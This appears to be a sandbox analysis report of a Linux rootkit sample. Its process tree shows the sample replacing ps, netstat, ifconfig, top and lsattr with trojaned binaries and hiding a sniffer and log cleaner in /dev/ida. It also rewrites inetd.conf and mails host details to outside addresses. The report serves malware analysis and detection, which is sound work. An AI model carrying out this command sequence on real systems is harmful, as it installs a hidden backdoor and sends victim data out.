Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/348/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/701/stat /usr/bin/killall N/A
File opened for reading /proc/166/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/uptime N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/116/cmdline /usr/bin/killall N/A
File opened for reading /proc/166/stat /usr/bin/killall N/A
File opened for reading /proc/373/stat /usr/bin/killall N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/705/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/346/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/700/stat /usr/bin/killall N/A
File opened for reading /proc/701/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/115/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/850/cmdline /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/exim4 N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/659/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/236/stat /usr/bin/killall N/A
File opened for reading /proc/372/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/145/cmdline /usr/bin/killall N/A
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/145/stat /usr/bin/killall N/A
File opened for reading /proc/318/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/116/cmdline /usr/bin/killall N/A
File opened for reading /proc/340/stat /usr/bin/killall N/A
File opened for reading /proc/850/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/150/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/mv N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/mv N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/rm N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/rm N/A
N/A N/A /sbin/ifconfig N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/muhNq3al /usr/bin/mail N/A
File opened for modification /tmp/muJn9dyP /usr/bin/mail N/A
File opened for modification /tmp/mugLMKRb /usr/bin/mail N/A
File opened for modification /tmp/mu9zWdaz /usr/bin/mail N/A
File opened for modification /tmp/muoF00gm /usr/bin/mail N/A
File opened for modification /tmp/computer /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 N/A
File opened for modification /tmp/mujqUXVi /usr/bin/mail N/A
File opened for modification /tmp/muijdqPT /usr/bin/mail N/A
File opened for modification /tmp/mueQACFR /usr/bin/mail N/A

Processes

/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-kYdqiw]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/df

[df -h]

/bin/cat

[cat computer]

/usr/bin/mail

[mail -s placinte [email protected]]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGV-0000Cj-J7]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGV-0000Cj-J7]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGY-0000Cu-6i]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGZ-0000Cw-2A]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root bin boot dev etc home initrd.img initrd.img.old lib lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinux vmlinux.old]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGZ-0000Cw-2A]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGb-0000DD-Ma]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/df

[df -h]

/usr/bin/mail

[mail -s placinte [email protected]]

/bin/cat

[cat computer]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGl-0000EQ-61]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGl-0000EQ-61]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGn-0000EW-Cv]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGn-0000EZ-P2]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGn-0000EZ-P2]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGp-0000En-Qq]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp

Files


/var/spool/exim4/msglog/1t2jGY-0000Cu-6i

MD5 94d397573f1307dddfcf6a062e130df0
SHA1 194604a0d71a0f4b935ef7c9e8c11a43c389890c
SHA256 f8b31747bedf0dbb653e49f05184f0513f1c59a2f58a15c17679e4795246b317
SHA512 64dd3308be0b589e59cc6f877fff4fbd39b120edc37c4d741ace91504233f10073696cc7c3fb4358580c7dda6be71c9e50ef55c53ad818bf521b5bf23a53f631

/var/spool/exim4/input/hdr.794

MD5 e35923736aeedb6dd1790a73b26620c3
SHA1 947b3528c4e7d973e3430d855e642a03eecfd23f
SHA256 587fadc3870871a666932ae9c27b9de030e3685d1565e5df5937e5387b3f66c6
SHA512 69d589ab0a0084642012fed89a057a5bdd6642be74a74484c3b29d974a84093158f4e3adcfe3b20eb0b244613b4e86eaa0519bc0ffeeb0ba51e88d5d2434c890

/var/spool/exim4/input/1t2jGZ-0000Cw-2A-D

MD5 e44ff39d35e21b5393bb08702148b252
SHA1 96f1be59719806a05abcd3891396aba19151fcbf
SHA256 71674448822a94d9e21c1666003209d2a3c8c43c3e1e09e5fbf6aa3f098c5003
SHA512 b6efadfc21ec6c8fce3c1473fb70b62559c9cbf336769b2e511aaf85176cd45a4c8890872926953ddcb63a928bfae6eab97809cdd70ad8ed316fd5e79a253da3

/var/spool/exim4/input/hdr.802

MD5 78a57d0a5cf2334f0f730d111cf010bc
SHA1 aae1760d00a507359430d5e5a6bd01acfc59b4fd
SHA256 3af3e7655ff5cd6a740ce30112101d1a4bf515d258c4bc923fb4d56a480aa424
SHA512 c35306f27da6948b41a783e58a73bdd9a233218757d7e17aa746f4d1d1719300de7070cea9c799f0c6eb3052a75ce245492e5e1513b8558cf0c05707679bb024

/var/spool/exim4/msglog/1t2jGZ-0000Cw-2A

MD5 dc079c0d5b78068d31cbd9ee06fbbe84
SHA1 935c75bf977913a589ec209e775596f714017236
SHA256 090baf6e0e03297d6c79a91c09e0f7535736b80506aa8449bc3dc117d25e6afd
SHA512 44bc24cdc3d55b6453d15b65d46082344ab3407048f622b90d90ecf9d2649e642f9c233dfc5c4e6bc3248d63c837141d14313bd60b6ff678d8563e9fe340c295

/var/mail/user

MD5 e4af9496641190839f0cd01bc84c4007
SHA1 feced251b14463ca75f1eb70f44c3248c0964fd1
SHA256 9e4a2ed4fa8e4430feeaae2267f73f0aa0a8a0eb1602edf70991087e3637aeac
SHA512 c90a0d3227a585dc1ed76557c1936bd85ac18e96c293ef03528a12a24c527e9706cf4c4bdab52acb87736eb1caa1ca5fb2e8297cf1329cb06833b5023f65cdcb

/var/spool/exim4/input/1t2jGY-0000Cu-6i-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/spool/exim4/msglog/1t2jGY-0000Cu-6i

MD5 bce7909f365e543f61c721ddeacac59c
SHA1 80d3d4f213976fbb00649705295b2a0004a0fbc5
SHA256 874e42e977c2d48c1172f004cec8506dac8f43470b59c7d03c26f39a871145dc
SHA512 b124b8854da5e97965fc8560fd4b22f8e121e7828687528e78c58a4f183cfa23f801d9619c60ee6815d6f8b71feaa371f4b396d17b64cace32fde8042c46ff3f

/var/spool/exim4/msglog/1t2jGZ-0000Cw-2A

MD5 3f32d3479f4ec8908144e0670c6f06c9
SHA1 daa2e10f937c752d66c7666e7ca7005ad2e9fc95
SHA256 22b62e5948011cc6d128247b36653e9c6ccdb149605bc5bc04c5217cd54b0d18
SHA512 35b9f1b67d21dbb1ae6e44b9108648f40633224e37421730ebeded63f916b2452cef5e3710d827948c35e02c7398b2e373fb854afefa0e84b18e7913edb8d9b5

/var/spool/exim4/input/1t2jGb-0000DD-Ma-D

MD5 3692b76f749ad170d508e41af8290047
SHA1 ae2ae6e9ba33136495df99e748e349a2184240cf
SHA256 ebda15a3b4f1a230e32b403e511afea77302d653b14816ab8024d7c52a380aa3
SHA512 fd8f59e19e1c308ddcaad9e5181c4894b420b7fae79ef41d26ac568d9cb4897a6fb26ea79ba184381ea2ee6b6e4f4cf6126c7d4419f76e80a0488ccce75a9272

/var/spool/exim4/input/hdr.819

MD5 e5997f5ecd583cc4137a38f6090f3349
SHA1 1721475a98301db37fb75d72611bc74272b93e7d
SHA256 2a078ca5ed366fc5ec12c4acd0de4737d45a90e5e9334a7e2a70814dbf573121
SHA512 4d7259cae228a57468e47146dc3a03faa233466f0233d77eae74ac9b65ff73b26704db860fcc06011e8830de3a935754ecf47af914c1a2e0cc254601af67763e

/var/spool/exim4/msglog/1t2jGb-0000DD-Ma

MD5 405a7a33311635c749051cfca01a2a40
SHA1 b3fb2643469803b3b7416819049721e99a8c0963
SHA256 92901a7c0ae8b3f273c1d2b8309b1b5e1eb167e903e3fbb41a7e14d70594633c
SHA512 bacd2c6dbea8c0080b46e390f8ffc0160d04a6d9641c639a582719b2bbee3c4c0a3468597776d2ee8f41d7e7705692e71784485e1d07ad90ed3f3a77f58eadfe

/var/spool/exim4/input/hdr.809

MD5 be480db2bbee60558226264890964e9f
SHA1 9fbc5a9fd3b4906655ee2232b4e96bff4fdd3b91
SHA256 d4af9d26a8706212e8af15e6a39933c287fa6046708f53638193e84704328ebf
SHA512 9bec0f72e426ab8c53f6a4b6789b76def43380d0c3a1fd437d382732ea8bde50ab09ff375a47a78d09f30399333ed096fbd87a971ee5a922aa6217987516be80

/var/mail/user

MD5 3ab6dcd3528a237f1429cf1f2256bfeb
SHA1 0c66e76331c02f5391b8851bd3abae458a8b209d
SHA256 049ba802c7755ccdebe4a90a8f7e4d2c61f8e6810549f3511aeb0461c2e6f6e4
SHA512 dc70ca9b7eae84cbe54c73a18cb3025133373754d501b54fe930aae657b8b5b4d3b4e487cfe2da3d5e9fc23d7b982e3735b1b16a991c200c1aaa5ce006fc29bd

/var/spool/exim4/msglog/1t2jGb-0000DD-Ma

MD5 9003cec07ddf08e7f3b2eeb7c8723fd7
SHA1 0687fdd80d73b72feec9d8fd855053a76fc66b25
SHA256 248c44f941c2c180eaaebed96b571bc642c61913fb5717e181e56db37fd4f19c
SHA512 d908bd7784170c427850e7574694648365f87f0aa9f8c6deed5589a575e221e5380d55cdd6ec63e4e4de856d350f49b60c99b01003877ae5f943cda00d279574

/computer

MD5 c14e1ec4730b7dbc13aab2c312fc6411
SHA1 490d446d3c80c365cba0fc02755cc6a5877d6a33
SHA256 672197eee87423f7d44f94cb2626dbcacfb32c1d70b1c971d80c2637d63e4b9f
SHA512 5e84a965fa88811a437de09018e3a7aea0c2a0f6cd21d26dd28723d146db75aed8eb50be60cbc086652a346872e31e80d033ea957f2f5365008f57a81472398d

/computer

MD5 0a2eecdfef59995d5f79f70197c020c1
SHA1 8ba05de31af9c34726c7e31c013d5018e74e4cac
SHA256 ec48d300d5c5a5b7aed7a9b5603756fb462961a3765f74aca798bbe60a62b0b4
SHA512 832c2f02b150e8e7018ad86cb5aa5c1b07d3ac55080f7fc5328201ebcadc5b35b56b8a8d029e5d4d62ed5dcc8a7b3780918236a4c3e9b2d6816c9f1238250580

/computer

MD5 774e9a89f47b593e38f6aefb19de0531
SHA1 58207145a0c0b350d6d26c80e83988a25adaa604
SHA256 a02170e26fab3acb6c05fcd12b68b782cbceb73fa46f8b52b8aef0e5c52a5ecb
SHA512 db871ab66cb739ac1d5df29078c9b680b8f82716a71d0dbbf8bfd6b15fae195a2fdd7d34193b94da821a6135da256fb1bf041c8d3b5aa303e845ee5582a33a8f

/var/spool/exim4/input/1t2jGl-0000EQ-61-D

MD5 61a6c28ffceafb1521f04aa6656a0b2f
SHA1 d3089b0f11bb485282333a9e1c5d18da13a824e6
SHA256 31689ae4953512bd7070f36c2e3868ca9f8f62227d84449b64921f825cc906a2
SHA512 24c77f15d14b4b86bff2e4aae0f329fb9749ed78c98db1e2c603a5438b4f0f9e88293524ffa01d1e3e30941ad0db71fcabb178fa70a727a73d668e595a861769

/var/spool/exim4/input/hdr.894

MD5 f85b70ba3b3b14c636a52269bb524933
SHA1 b047efd7267a1d992c1fb64b6be3c35de922ec64
SHA256 24a3b9ec4db3dcfc880c14d1369e51e08ade9c7823a90cabc7974b3752dd40b6
SHA512 8c7a55a3fb5a5581a56b33f1a8365fa1d376751c40fa35a0968a81832cefb684dc390e4cee0886090881523676dc2c961abe0a4024faafe923ea8b1f42c3b883

/var/spool/exim4/msglog/1t2jGl-0000EQ-61

MD5 687ea130dcb9c438bec9a1c28bce9509
SHA1 bd8db3c1c512a74b3a0534246d579a6d7c437360
SHA256 913efafe2c62333d76f115463a1f8ba0851fb951b9f8a0c8cc7ac517f3cb3c23
SHA512 38077cc120df07854191be563c40b96855bca410d66e2f695716510e7177f42ae3bc51f52e58ee3e9b234f83bf0b7dc274a2ed1fc5e468049df7763e13d5a842

/var/spool/exim4/msglog/1t2jGl-0000EQ-61

MD5 3059fca7adadf1b1bead897f910d17fa
SHA1 f283d55eb6e75890698e84bbd52ebb797006961b
SHA256 8c9a8b9118275464815748d94529332806dc82602c68aa4793af20f00c4bdd62
SHA512 1ccd44a2d529970f0b2665d35e00e4e008c8747d6e2d63a330b2d8cfc8582d671c049f71c3b140065e2fd0cfe695c60ff75497a96ec9f6a505e90e1afdd3d447

/var/spool/exim4/input/1t2jGn-0000EW-Cv-D

MD5 62a996c26a20fbc112a0c928e29adb5d
SHA1 a26c80a80f989964c0fd26f4f39b0ada35e6923d
SHA256 0bfbf71f1a3a6c5b59de9241d9e1b400ba589da937dcdb297f02ba45ad336e1e
SHA512 3a5ec144f81b41680a441183f7c9254304b72b0dbdb6767dac3839153531476b0453cad1eb950e00d2f7d50af4e64dcd81bf26c4874a6e1f64fbfe7b305ea60b

/var/spool/exim4/input/hdr.900

MD5 fddd44ac80894e39a9bafa2598058cdf
SHA1 81800f07fecedd723556de72c6c708412219f969
SHA256 e361390985eb68c3e8d5ee11e7e81a893eea7582446a99f6cac3d4c055b8a1b8
SHA512 b4d08ebf1880b510c0326f580a0a2f3916751d4a9bb570856bda4f5f1afca8feaf5108dcca6a21174b8abc27864d4015be7a1419a2f47bbb37177e8d0d0ec8ba

/var/spool/exim4/msglog/1t2jGn-0000EW-Cv

MD5 937ed0c335b78ad6883bf72eaa027fa3
SHA1 8373866ae69594f197820f30f9d24ee117a3968d
SHA256 5a9f26bbd1c3782e97fb8eb657efac47ef674f605fbf9a5f77a211851bbf7e79
SHA512 1778b6bb85bbbf9077b974db9b54b0332ba42672c40d687af8326c27653931106a724d59ad05b56e0232656f31b6d6e138972246f1e287a2be7f8e05df7442b6

/var/spool/exim4/input/hdr.895

MD5 86715e1724e0e49e3ed3c9449bb3b35b
SHA1 34f160d2905340d8ebd1e2d6d4eb2b680dd63633
SHA256 941c259716bf59ef5b02127b89fb1947b3b074ea681babecb6be702cbe1f4bd1
SHA512 78a9214e116c9e99280e91f0d036da60607cad3533ec6d9254bd643d815d1add92ca5bbe6c29f6ca18b0ce631da5e57cc587040fc0e8d4cce7270ec09da5d266

/var/spool/exim4/input/1t2jGn-0000EZ-P2-D

MD5 64c032b3d2f4a344e9e1d60c6f8dbec7
SHA1 016fc6677a01b6d6d43e3a7845d76e629162bd2c
SHA256 ddaefb367848ca3ef99ab0d939e8ae0ad872bfac6c237cd9fb90f40bced476c7
SHA512 097f6ed81bc268d30d4d752c31875e303853c6e1019931c7c8ad725d49c614b02c73081ae0321597ec0d14bea4099273b1dc12d5d5f7726b4ef568d8f93f62e1

/var/spool/exim4/input/hdr.903

MD5 8331b7c8fc846f907dd14382e55abaaa
SHA1 42ec705a65ad4c553565e806cd7d0c7d21fe1b0c
SHA256 cc816ef741922795f8c2bf416ea83fd82c55e2e876cf69cc57822e72ae505fbc
SHA512 3ca20281077bc8acaf3337fd591bfc44ee2453697f5bb2095d04804fe52ad7acda491b5857df453ed84f658e795090e4a8888bdaa07da5582b20c36caec07747

/var/spool/exim4/msglog/1t2jGn-0000EZ-P2

MD5 dd135bd5214ba3aded772be7907f91d9
SHA1 5276652c2a6896629c0145922f211c12c8873ca1
SHA256 23bd03eec8ff13dc908acc0ecff042fe65e6fa12c05daf07beaddd0f398c7447
SHA512 cb9944d4085f093705906f46e40038d4111e52f85f0acced0fe0f3b17c97ab377dc3c4f25a83ed1f895bc78f9fa396bf69af404c848e44f29f6fefc66e0f74ca

/var/mail/user

MD5 19c7ce376426438a5cb219c3374c7777
SHA1 bb88199d0eb0f0582ed61f6b572e44e11cfed218
SHA256 a337dec62273933ebe9dbaf31480143128489b26948a77ba401be43e78c561f2
SHA512 9e66ee3081c5f012e053930e73772c6310679ef1305f554ef587ac290e0329bbff573101f9803dc5a7f89792a080edf30aba5612480db4e9f30362c80edd376f

/var/spool/exim4/msglog/1t2jGn-0000EW-Cv

MD5 6a04bc75839893258b247d000952a746
SHA1 0f418187636f0d9fa8957b467ef92641e857c472
SHA256 08c22bdefa06bd9b47a957b1f25b461b17179458a85c084d228469e895ddaedb
SHA512 332d431bc6fc5a1d66c763b675724d2dd3be2d600af0961572495e197208b81447c72dbdcb4d1d2060a7a0389c53cfa2788436f4b3b33367f117edb3f81d38b0

/var/spool/exim4/msglog/1t2jGn-0000EZ-P2

MD5 952d1f284d33e990fad874c9025e880c
SHA1 5ee48456a14d3652ffd1ba89c9b915ba584426de
SHA256 1da3e02dd29b58b542c902a356df24aeddea417ac3816fb833fd0b105f81fc24
SHA512 03c9742f5bbd0a9eb13a97ef6c6f707aa9c54e26929f5f1e3a130f3542528c2b1714367f0c41cfa0d60625ce98db0bacee4c78c6302521218382ed5dd5cbf90c

/var/spool/exim4/input/1t2jGp-0000En-Qq-D

MD5 bd67f759017201243930bbbc11483309
SHA1 babf7a8fa57b13cd92c472a696ea95ba0a42b50c
SHA256 22e4d3f96cdac9c1ad42309c79a75b6e2295c3c75763e81290170470cdcb4ca8
SHA512 c52d91f687072ca98b1e7e43be29a5ad2bcb49d2b01c22aae62f9ac02ca887d815f19750d224ab4c9b05daf953f15284280f3c8201664a1684bd526fa7cecdc6

/var/spool/exim4/input/hdr.917

MD5 fa74ef3d92cdb6b9517667787e85db89
SHA1 45b4da47af6b889661faca5f03e534dd05382cdf
SHA256 c627b1dc1cd21b4c0621e1989596e1bd3dcff5f1019e0ed00468d368213f2161
SHA512 76dda9c443233cf3b402b423e9f9b139a8b66cf7ecbe2708b4fc9e60f4b6f05004659c045628ab05c21fe2bed289163a81801a816cd2fe864c653b09e1c1afdf

/var/spool/exim4/msglog/1t2jGp-0000En-Qq

MD5 f3460018edc893d6432dc224cd94a36b
SHA1 98deaccbab82d8bb2885739fb0628acb5304cfad
SHA256 04b54dde75b3e111d5be2637a0c350832857fbece06a177ad04e67ad78e8047a
SHA512 80bc0a8ec6db9575e09cd25a0c2b6cec3565c084f596d6facfaf1c8167c01d2095a08d4b89f78f284c4d2d365e3ebbbb0e257e2940ac27ed4d0092e98ee0871b

/var/spool/exim4/input/hdr.909

MD5 915da82d117a7dd46386df3b01f54a6f
SHA1 77588e83ac0986c5473aa8732b4b6362d29f1033
SHA256 8b107a65a26cfd7ed6315882a40b2872c4b5d5b58b8de676778abeae73a3d29a
SHA512 98a3b968ec1433df097b2dc7a63a8e2044649c801bb83500c399b09f66803699dd277acd83c3c1b46438e072a30579346d7f5da6db891ad63c5ff3de98b3f6e0

/var/mail/user

MD5 784cfa29123c38761019515823197d1a
SHA1 43f624e89eeed093a1d1eaddaea5bd3d4ca37553
SHA256 a3b9f63630e868b5c70fb2ab6655c13074f60d421cd7e221ea3f5a0ea6624613
SHA512 393350983b8c3c308dc46c3ab228ef9245ab99eea4eb1412ce1a71e99e8d2f2a5ff46631dc96104a3f95b762abd6aeb76235a5441fadb68ba17b843d3465a76b

/var/spool/exim4/msglog/1t2jGp-0000En-Qq

MD5 23b9d284fbb7a737183134b7b451d9ef
SHA1 1a8a0d2a1824920327706ea6bdd228ef4ff3b96c
SHA256 7cc9fbd942fbccc5134cf55ad6df7e73090caee82e62682b08d70ea84cb74146
SHA512 32c835cef889e225bc9e0e8cefd6f4b8bd5181064d4a36901cf66fe65fb8fbfbbeff224967f751cf876ea69088e86a26bf1ab5f74c8335dafb1e4d58c1f9f158